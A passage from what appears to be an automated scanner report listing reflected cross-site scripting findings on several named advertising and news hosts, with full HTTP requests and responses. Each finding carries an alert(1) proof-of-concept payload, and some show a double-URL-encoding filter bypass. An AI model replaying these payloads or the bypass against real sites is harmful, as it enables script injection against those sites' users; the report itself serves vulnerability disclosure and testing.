GET /partner_json/search?spn_limit=1&advq=true&sponsored=true&limit=10&fields=event.id%2Cevent.name%2Cevent.zurl%2Cevent.starttime%2Cevent.venue_id%2Cevent.has_tickets%2Cevent.tickets_on_sale%2Cvenue.name%2Cvenue.id&where=savannah%2C+ga&radius=&v=&tag=&what=&when=&nbh=&rand_spn=5&st=event4eca2<script>alert(1)</script>359798be485&jsonsp=jsp_0 HTTP/1.1
Host: go.savannahnow.com
Proxy-Connection: keep-alive
Referer: http://savannahnow.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Mon, 12 Sep 2011 12:49:21 GMT
Content-Type: text/plain; charset=utf-8
Connection: keep-alive
Status: 200 OK
X-Rack-Cache: miss, store
X-HTTP_CLIENT_IP_O: 50.23.123.106
Access-Control-Allow-Origin: *
X-Runtime: 24
ETag: "0194a4c93866eccde160f1035af0809f"
Z-DETECTED-FLAVOR: go_flavor |
X-Content-Digest: 5bfc14f4ea2617979a6a978686383b96c0f6e602
Z-REQUEST-HANDLED-BY: www2
Cache-Control: max-age=1800, public
Set-Cookie:
Age: 0
Content-Length: 131

{"rsp":{"status":"failed","msg":"Invalid search: event4eca2<script>alert(1)</script>359798be485 is not a valid search category."}}

2.40. http://go.savannahnow.com/partner_json/search [when parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://go.savannahnow.com
Path:   /partner_json/search

Issue detail

The value of the when request parameter is copied into the HTML document as plain text between tags. The payload 981f1<script>alert(1)</script>87e3a8b3059 was submitted in the when parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /partner_json/search?spn_limit=1&advq=true&sponsored=true&limit=10&fields=event.id%2Cevent.name%2Cevent.zurl%2Cevent.starttime%2Cevent.venue_id%2Cevent.has_tickets%2Cevent.tickets_on_sale%2Cvenue.name%2Cvenue.id&where=savannah%2C+ga&radius=&v=&tag=&what=&when=981f1<script>alert(1)</script>87e3a8b3059&nbh=&rand_spn=5&st=event&jsonsp=jsp_0 HTTP/1.1
Host: go.savannahnow.com
Proxy-Connection: keep-alive
Referer: http://savannahnow.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Mon, 12 Sep 2011 12:49:20 GMT
Content-Type: text/plain; charset=utf-8
Connection: keep-alive
Status: 200 OK
X-Rack-Cache: miss, store
X-HTTP_CLIENT_IP_O: 50.23.123.106
Access-Control-Allow-Origin: *
X-Runtime: 13
ETag: "6986547c32d2f6c71a345b5533518c4f"
Z-DETECTED-FLAVOR: go_flavor |
X-Content-Digest: ac041bd2a8770ddbb4df97f54f3d6fc3eb49d0b7
Z-REQUEST-HANDLED-BY: www29
Cache-Control: max-age=1800, public
Set-Cookie:
Age: 0
Content-Length: 464

{"rsp":{"status":"failed","msg":"Unrecognized date format: 981f1<script>alert(1)</script>87e3a8b3059 is not recognized as a valid time. Here are some examples of times that we recognize:<ul style='padding-left:15px;'>
...[SNIP]...

2.41. http://imp.fetchback.com/serve/fb/adtag.js [clicktrack parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://imp.fetchback.com
Path:   /serve/fb/adtag.js

Issue detail

The value of the clicktrack request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 201ed"-alert(1)-"075db5ed9f was submitted in the clicktrack parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /serve/fb/adtag.js?tid=68318&type=halfpage&clicktrack=http%3A%2F%2Fadserving%2Ecpxinteractive%2Ecom%2Fclk%3F3%2CeAGdS9sOgjAU%2DyEiuwCbLj4MiARhUXGI%2DobgLTg1EZ3x6w0qfIB96GlPW4gZ7RMMIdwRCvIcQMIgRnaZbx1kEQMwxgixMcEWdQx1S13uIifg%2Ety3Af9APLLx%2Eit5exs7pQ17XvSi8e9%2E3neFAMqwyf8FipJ2Gnpcf3WiovtShm6bcL%2DsJlkKRRCCOEsqgWa1kKOT8IAtgoWKZWGtZVkJuXquVYom3ZAPDeNQ19eBaWqte%2DeLvt43p2PRKy7KfANOHFZH%2C201ed"-alert(1)-"075db5ed9f HTTP/1.1
Host: imp.fetchback.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?msUBAB26GADSD50AAAAAAMvWJgAAAAAAAgAAAAAAAAAAAP8AAAACCKz8LgAAAAAAnggAAAAAAAAG1TIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA2KRAAAAAAAAICAwAAAAAAGy.dJAYBFUAbL90kBgEVQAAAeoulitI.ZmZmZmZmAUAAAPi53LjYPzMzMzMzMwdAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABbksInE-S2CpsKXXVhy0SGaDsCy0zxGJguLNV6AAAAAA==,,http%3A%2F%2Fwww.nowpublic.com%2F,B%3D10%26Z%3D0x0%26_salt%3D1964679122%26anmember%3D541%26anprice%3D%26r%3D1%26s%3D1620509%26y%3D29,7d9e50b4-dd3d-11e0-90ef-78e7d161fe68
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: opt=1

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:48:39 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: uid=1_1315831719_1315831704896:4216901696863812; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Mon, 12 Sep 2011 12:48:39 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 581

document.write("<"+"iframe src='http://imp.fetchback.com/serve/fb/imp?tid=68318&type=halfpage&clicktrack=http%3A%2F%2Fadserving%2Ecpxinteractive%2Ecom%2Fclk%3F3%2CeAGdS9sOgjAU%2DyEiuwCbLj4MiARhUXGI%2D
...[SNIP]...
QMIgRnaZbx1kEQMwxgixMcEWdQx1S13uIifg%2Ety3Af9APLLx%2Eit5exs7pQ17XvSi8e9%2E3neFAMqwyf8FipJ2Gnpcf3WiovtShm6bcL%2DsJlkKRRCCOEsqgWa1kKOT8IAtgoWKZWGtZVkJuXquVYom3ZAPDeNQ19eBaWqte%2DeLvt43p2PRKy7KfANOHFZH%2C201ed"-alert(1)-"075db5ed9f' width='300' height='600' marginheight='0' marginwidth='0' frameborder='0' scrolling='no'"+">
...[SNIP]...

2.42. http://imp.fetchback.com/serve/fb/adtag.js [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://imp.fetchback.com
Path:   /serve/fb/adtag.js

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 39080"-alert(1)-"bab3b8cff84 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /serve/fb/adtag.js?tid=68318&type=halfpage&clicktrack=http%3A%2F%2Fadserving%2Ecpxinteractive%2Ecom%2Fclk%3F3%2CeAGdS9sOgjAU%2DyEiuwCbLj4MiARhUXGI%2DobgLTg1EZ3x6w0qfIB96GlPW4gZ7RMMIdwRCvIcQMIgRnaZbx1kEQMwxgixMcEWdQx1S13uIifg%2Ety3Af9APLLx%2Eit5exs7pQ17XvSi8e9%2E3neFAMqwyf8FipJ2Gnpcf3WiovtShm6bcL%2DsJlkKRRCCOEsqgWa1kKOT8IAtgoWKZWGtZVkJuXquVYom3ZAPDeNQ19eBaWqte%2DeLvt43p2PRKy7KfANOHFZH%2C&39080"-alert(1)-"bab3b8cff84=1 HTTP/1.1
Host: imp.fetchback.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?msUBAB26GADSD50AAAAAAMvWJgAAAAAAAgAAAAAAAAAAAP8AAAACCKz8LgAAAAAAnggAAAAAAAAG1TIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA2KRAAAAAAAAICAwAAAAAAGy.dJAYBFUAbL90kBgEVQAAAeoulitI.ZmZmZmZmAUAAAPi53LjYPzMzMzMzMwdAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABbksInE-S2CpsKXXVhy0SGaDsCy0zxGJguLNV6AAAAAA==,,http%3A%2F%2Fwww.nowpublic.com%2F,B%3D10%26Z%3D0x0%26_salt%3D1964679122%26anmember%3D541%26anprice%3D%26r%3D1%26s%3D1620509%26y%3D29,7d9e50b4-dd3d-11e0-90ef-78e7d161fe68
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: opt=1

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:48:40 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: uid=1_1315831720_1315831704896:4216901696863812; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Mon, 12 Sep 2011 12:48:40 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 585

document.write("<"+"iframe src='http://imp.fetchback.com/serve/fb/imp?tid=68318&type=halfpage&clicktrack=http%3A%2F%2Fadserving%2Ecpxinteractive%2Ecom%2Fclk%3F3%2CeAGdS9sOgjAU%2DyEiuwCbLj4MiARhUXGI%2D
...[SNIP]...
MIgRnaZbx1kEQMwxgixMcEWdQx1S13uIifg%2Ety3Af9APLLx%2Eit5exs7pQ17XvSi8e9%2E3neFAMqwyf8FipJ2Gnpcf3WiovtShm6bcL%2DsJlkKRRCCOEsqgWa1kKOT8IAtgoWKZWGtZVkJuXquVYom3ZAPDeNQ19eBaWqte%2DeLvt43p2PRKy7KfANOHFZH%2C&39080"-alert(1)-"bab3b8cff84=1' width='300' height='600' marginheight='0' marginwidth='0' frameborder='0' scrolling='no'"+">
...[SNIP]...

2.43. http://imp.fetchback.com/serve/fb/adtag.js [type parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://imp.fetchback.com
Path:   /serve/fb/adtag.js

Issue detail

The value of the type request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f4e58"-alert(1)-"f14e903ca51 was submitted in the type parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /serve/fb/adtag.js?tid=68318&type=halfpagef4e58"-alert(1)-"f14e903ca51&clicktrack=http%3A%2F%2Fadserving%2Ecpxinteractive%2Ecom%2Fclk%3F3%2CeAGdS9sOgjAU%2DyEiuwCbLj4MiARhUXGI%2DobgLTg1EZ3x6w0qfIB96GlPW4gZ7RMMIdwRCvIcQMIgRnaZbx1kEQMwxgixMcEWdQx1S13uIifg%2Ety3Af9APLLx%2Eit5exs7pQ17XvSi8e9%2E3neFAMqwyf8FipJ2Gnpcf3WiovtShm6bcL%2DsJlkKRRCCOEsqgWa1kKOT8IAtgoWKZWGtZVkJuXquVYom3ZAPDeNQ19eBaWqte%2DeLvt43p2PRKy7KfANOHFZH%2C HTTP/1.1
Host: imp.fetchback.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?msUBAB26GADSD50AAAAAAMvWJgAAAAAAAgAAAAAAAAAAAP8AAAACCKz8LgAAAAAAnggAAAAAAAAG1TIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA2KRAAAAAAAAICAwAAAAAAGy.dJAYBFUAbL90kBgEVQAAAeoulitI.ZmZmZmZmAUAAAPi53LjYPzMzMzMzMwdAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABbksInE-S2CpsKXXVhy0SGaDsCy0zxGJguLNV6AAAAAA==,,http%3A%2F%2Fwww.nowpublic.com%2F,B%3D10%26Z%3D0x0%26_salt%3D1964679122%26anmember%3D541%26anprice%3D%26r%3D1%26s%3D1620509%26y%3D29,7d9e50b4-dd3d-11e0-90ef-78e7d161fe68
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: opt=1

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:48:39 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: uid=1_1315831719_1315831704896:4216901696863812; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Mon, 12 Sep 2011 12:48:39 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 582

document.write("<"+"iframe src='http://imp.fetchback.com/serve/fb/imp?tid=68318&type=halfpagef4e58"-alert(1)-"f14e903ca51&clicktrack=http%3A%2F%2Fadserving%2Ecpxinteractive%2Ecom%2Fclk%3F3%2CeAGdS9sOgjAU%2DyEiuwCbLj4MiARhUXGI%2DobgLTg1EZ3x6w0qfIB96GlPW4gZ7RMMIdwRCvIcQMIgRnaZbx1kEQMwxgixMcEWdQx1S13uIifg%2Ety3Af9APLLx%2Eit
...[SNIP]...

2.44. http://js.revsci.net/gateway/gw.js [bpid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /gateway/gw.js

Issue detail

The value of the bpid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload db834'%3balert(1)//bfe5e4d0684 was submitted in the bpid parameter. This input was echoed as db834';alert(1)//bfe5e4d0684 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /gateway/gw.js?csid=G07610&bpid=S0277db834'%3balert(1)//bfe5e4d0684 HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=optout

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 12 Sep 2011 12:48:26 GMT
Cache-Control: max-age=86400, private
Expires: Tue, 13 Sep 2011 12:48:26 GMT
X-Proc-ms: 0
Content-Type: application/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Mon, 12 Sep 2011 12:48:26 GMT
Content-Length: 6077

//AG-develop 12.7.1-110 (2011-08-15 17:17:21 UTC)
var rsi_now= new Date();
var rsi_csid= 'G07610';if(typeof(csids)=="undefined"){var csids=[rsi_csid];}else{csids.push(rsi_csid);};function rsiClient(Da
...[SNIP]...
i>>18))+"%"+_rsiCa(0x80+(i>>12&0x3F))+"%"+_rsiCa(0x80+(i>>6&0x3F))+"%"+_rsiCa(0x80+(i&0x3F));}window[rsi_csid]=new rsiClient(rsi_csid);
if(window[rsi_csid])window[rsi_csid].DM_addEncToLoc("bpid",'S0277db834';alert(1)//bfe5e4d0684');else DM_addEncToLoc("bpid",'S0277db834';alert(1)//bfe5e4d0684');
function asi_addElem(e){var p=document.body==null?document.getElementsByTagName('head')[0]:document.body;p.insertBefore(e,p.firstChil
...[SNIP]...

2.45. http://js.revsci.net/gateway/gw.js [csid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /gateway/gw.js

Issue detail

The value of the csid request parameter is copied into the HTML document as plain text between tags. The payload e011b<script>alert(1)</script>84c98d127a9 was submitted in the csid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /gateway/gw.js?csid=G07610e011b<script>alert(1)</script>84c98d127a9&bpid=S0277 HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=optout

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 12 Sep 2011 12:48:26 GMT
Cache-Control: max-age=86400, private
Expires: Tue, 13 Sep 2011 12:48:26 GMT
X-Proc-ms: 0
Content-Type: application/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Mon, 12 Sep 2011 12:48:25 GMT
Content-Length: 128

/*
* JavaScript include error:
* The customer code "G07610E011B<SCRIPT>ALERT(1)</SCRIPT>84C98D127A9" was not recognized.
*/

2.46. http://metrics.impactengine.com/rest/reveal/129534/5011/Expand_Content [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://metrics.impactengine.com
Path:   /rest/reveal/129534/5011/Expand_Content

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload ff9a5%253cscript%253ealert%25281%2529%253c%252fscript%253ec42ce07177e was submitted in the REST URL parameter 3. This input was echoed as ff9a5<script>alert(1)</script>c42ce07177e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rest/reveal/129534ff9a5%253cscript%253ealert%25281%2529%253c%252fscript%253ec42ce07177e/5011/Expand_Content?invalidate=1315849766118 HTTP/1.1
Host: metrics.impactengine.com
Proxy-Connection: keep-alive
Referer: http://adserv.impactengine.com/FASAdViewer_1000x1000.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 14:07:17 GMT
Server: Apache/2.2.14 (EL)
X-Powered-By: PHP/5.2.11
P3P: CP="NOI NID ADMa OUR IND UNI COM NAV"
Content-Length: 104
Connection: close
Content-Type: text/html; charset=UTF-8

<rsp stat="ok"><reveal>    <success id='129534ff9a5<script>alert(1)</script>c42ce07177e' /></reveal></rsp>

2.47. http://metrics.impactengine.com/rest/view/129534/5011/0 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://metrics.impactengine.com
Path:   /rest/view/129534/5011/0

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 282db%253cscript%253ealert%25281%2529%253c%252fscript%253eec15e8ec8fe was submitted in the REST URL parameter 3. This input was echoed as 282db<script>alert(1)</script>ec15e8ec8fe in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rest/view/129534282db%253cscript%253ealert%25281%2529%253c%252fscript%253eec15e8ec8fe/5011/0?invalidate=1315849757167 HTTP/1.1
Host: metrics.impactengine.com
Proxy-Connection: keep-alive
Referer: http://adserv.impactengine.com/FASAdViewer_1000x1000.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 14:07:03 GMT
Server: Apache/2.2.14 (EL)
X-Powered-By: PHP/5.2.11
P3P: CP="NOI NID ADMa OUR IND UNI COM NAV"
Content-Length: 110
Connection: close
Content-Type: text/html; charset=UTF-8

<rsp stat="ok"><mouse_over>    <success id='129534282db<script>alert(1)</script>ec15e8ec8fe' /></mouse_over</rsp>

2.48. http://metrics.impactengine.com/rest/view/129534/5011/30 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://metrics.impactengine.com
Path:   /rest/view/129534/5011/30

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 3bc3b%253cscript%253ealert%25281%2529%253c%252fscript%253e5e97cebc5eb was submitted in the REST URL parameter 3. This input was echoed as 3bc3b<script>alert(1)</script>5e97cebc5eb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rest/view/1295343bc3b%253cscript%253ealert%25281%2529%253c%252fscript%253e5e97cebc5eb/5011/30?invalidate=1315849787169 HTTP/1.1
Host: metrics.impactengine.com
Proxy-Connection: keep-alive
Referer: http://adserv.impactengine.com/FASAdViewer_1000x1000.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 14:07:21 GMT
Server: Apache/2.2.14 (EL)
X-Powered-By: PHP/5.2.11
P3P: CP="NOI NID ADMa OUR IND UNI COM NAV"
Content-Length: 110
Connection: close
Content-Type: text/html; charset=UTF-8

<rsp stat="ok"><mouse_over>    <success id='1295343bc3b<script>alert(1)</script>5e97cebc5eb' /></mouse_over</rsp>

2.49. http://ms0.erovinmo.com/keywords/instrument.js [jsoncallback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ms0.erovinmo.com
Path:   /keywords/instrument.js

Issue detail

The value of the jsoncallback request parameter is copied into the HTML document as plain text between tags. The payload 2605f<script>alert(1)</script>490f7962273 was submitted in the jsoncallback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /keywords/instrument.js?jsoncallback=JSONPCallback_02605f<script>alert(1)</script>490f7962273&rewrite=1&user=7DT4-LSd0UCS83EGURP5H.20110912T174842&referrer=http%3A//drupal.org/cases&href=http%3A//www.nowpublic.com/&appCodeName=Mozilla&appMinorVersion=undefined&appName=Netscape&appVersion=5.0%20%28Windows%20NT%206.1%3B%20WOW64%29%20AppleWebKit/535.1%20%28KHTML%2C%20like%20Gecko%29%20Chrome/13.0.782.220%20Safari/535.1&cpuClass=undefined&platform=Win32&systemLanguage=undefined&userAgent=Mozilla/5.0%20%28Windows%20NT%206.1%3B%20WOW64%29%20AppleWebKit/535.1%20%28KHTML%2C%20like%20Gecko%29%20Chrome/13.0.782.220%20Safari/535.1&userLanguage=undefined&client_timestamp=1315849722.416&target=http%3A%2F%2Fwww.nowpublic.com%2F&site_guid=eba178ba8c951c7df3db8e30420828b4a944a1f6bfefa3cab333d20c7be54610&demo_mode=false HTTP/1.1
Host: ms0.erovinmo.com
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:45:52 GMT
Server: Apache/2.2.12 (Ubuntu)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.2
ETag: "eb9171331ec7a7070901e13e357378cd"
X-Runtime: 52
Cache-Control: private, max-age=0, must-revalidate
Content-Length: 159
Status: 200
Content-Type: text/javascript; charset=utf-8

JSONPCallback_02605f<script>alert(1)</script>490f7962273({"blacklists":[],"xpaths":["//div[@class='content-text']"],"message":"new page re-instrumenting: ok"})

2.50. http://ms4.erovinmo.com/keywords/instrument.js [jsoncallback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ms4.erovinmo.com
Path:   /keywords/instrument.js

Issue detail

The value of the jsoncallback request parameter is copied into the HTML document as plain text between tags. The payload 97df2<script>alert(1)</script>c347156b75c was submitted in the jsoncallback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /keywords/instrument.js?jsoncallback=JSONPCallback_097df2<script>alert(1)</script>c347156b75c&rewrite=1&user=7DT4-LSd0UCS83EGURP5H.20110912T174842;%20s_cc=true;%20s_sq=%5B%5BB%5D%5D;%20__utma=71223567.258103543.1315849717.1315849717.1315849717.1;%20__utmb=71223567.2.10.1315849717;%20__utmc=71223567;%20__utmz=71223567.1315849717.1.1.utmcsr=drupal.org&referrer=http%3A//www.nowpublic.com/&href=http%3A//www.nowpublic.com/&appCodeName=Mozilla&appMinorVersion=undefined&appName=Netscape&appVersion=5.0%20%28Windows%20NT%206.1%3B%20WOW64%29%20AppleWebKit/535.1%20%28KHTML%2C%20like%20Gecko%29%20Chrome/13.0.782.220%20Safari/535.1&cpuClass=undefined&platform=Win32&systemLanguage=undefined&userAgent=Mozilla/5.0%20%28Windows%20NT%206.1%3B%20WOW64%29%20AppleWebKit/535.1%20%28KHTML%2C%20like%20Gecko%29%20Chrome/13.0.782.220%20Safari/535.1&userLanguage=undefined&client_timestamp=1315850026.67&target=http%3A%2F%2Fwww.nowpublic.com%2F&site_guid=eba178ba8c951c7df3db8e30420828b4a944a1f6bfefa3cab333d20c7be54610&demo_mode=false HTTP/1.1
Host: ms4.erovinmo.com
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _lsx0=2MCV-LSx0ZOAPAI0GDGJ7

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:57:37 GMT
Server: Apache/2.2.14 (Ubuntu)
